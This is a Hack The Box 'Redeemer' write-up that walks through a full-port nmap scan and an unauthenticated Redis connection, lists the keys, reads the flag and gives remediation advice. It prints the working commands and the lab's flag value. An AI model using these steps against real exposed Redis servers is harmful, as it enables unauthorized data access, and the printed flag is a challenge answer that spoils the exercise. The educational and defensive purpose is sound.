
🧑🏼‍🎄 Redeemer

Redis Port 6379/tcp

🗄️ HTB Redeemer - Solution Notes

Platform: Hack The Box - Starting Point (Tier 0)
Machine: Redeemer
OS: Linux
Difficulty: Very Easy
Vulnerability Type: Misconfiguration


🗺️ Attack Chain

Nmap (all ports) → Redis discovery → Unauthenticated connection → List keys → Read flag


🧠 How Does a Hacker Think? - Before You Begin

On this machine, the initial nmap scan came back empty. This is unusual: by default nmap only scans the 1000 most common ports, and some services run on non-standard ports.

1️⃣ Reconnaissance

Port Scanning

```bash
nmap -p- --min-rate 5000 -sV 10.129.52.120
```

Parameter Breakdown:

  - -p-: scan all 65535 TCP ports instead of nmap's default top 1000
  - --min-rate 5000: send at least 5000 packets per second so the full-port scan finishes quickly
  - -sV: probe the open ports to identify the service and version running on them

Findings: Redis is listening on 6379/tcp.

💡 What is Redis?

Redis is an in-memory key-value data store, typically used as a cache or message broker, that listens on 6379/tcp by default.

🧠 How Does a Hacker Think? - When You Find an Unauthenticated Service

You found the Redis port and confirmed the service can be accessed without authentication. So what do you do now?

2️⃣ Exploitation - Connecting to Redis and Reading the Flag

Step 1: Establish Connection

💡 What is redis-cli?

redis-cli is the command-line client that ships with Redis; -h sets the host to connect to, and with no password configured the connection succeeds immediately.

```bash
redis-cli -h 10.129.52.120
```

Step 2: Server Info and Database Analysis

💡 The info Command

info returns server statistics and configuration details, including a # Keyspace section that lists each logical database and how many keys it holds.

```bash
info
```

In the # Keyspace section of the output:

```
db0:keys=4
```

→ Database 0 contains 4 keys.

Step 3: Select Database and List Keys

💡 The select and keys * Commands

select 0 switches to logical database 0; keys * lists every key in it (the * is a glob pattern that matches all key names).

```bash
select 0
keys *
```

Output:

```
1) "numb"
2) "temp"
3) "stor"
4) "flag"
```

Step 4: Read the Flag

💡 The get Command

get returns the string value stored under the given key.

```bash
get flag
```

Flag: 03e1d2b376c37ab3f5319922053953eb


🧠 How Does a Hacker Think? - Why Did This Vulnerability Exist?

Redis was designed as a performance-focused tool. Authentication is disabled by default because Redis is expected to run "on an internal network."

4️⃣ Technical Analysis - Root Cause and Remediation

Root Cause: The requirepass parameter is not set in redis.conf, and the service is exposed to the external network.

Remediation:

```bash
# 1. Require a password
requirepass <STR0NG_P4SSW0RD>

# 2. Only allow access from localhost
bind 127.0.0.1

# 3. Disable dangerous commands
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command DEBUG ""
```


📚 Concepts Learned


🔑 General Hacker Mindset Summary

  1. If the first scan returns nothing, use -p- to scan all ports: Services can run outside the standard 1000 ports.
  2. Unauthenticated service = direct access: Databases like Redis, MongoDB, and Elasticsearch can be wide open in default installs.
  3. Use info to understand the state, keys * to see the contents: Once you're in a database, always check what's there first.
  4. Misconfiguration is the most common vulnerability: It's human error, not technical bugs, that usually opens the door.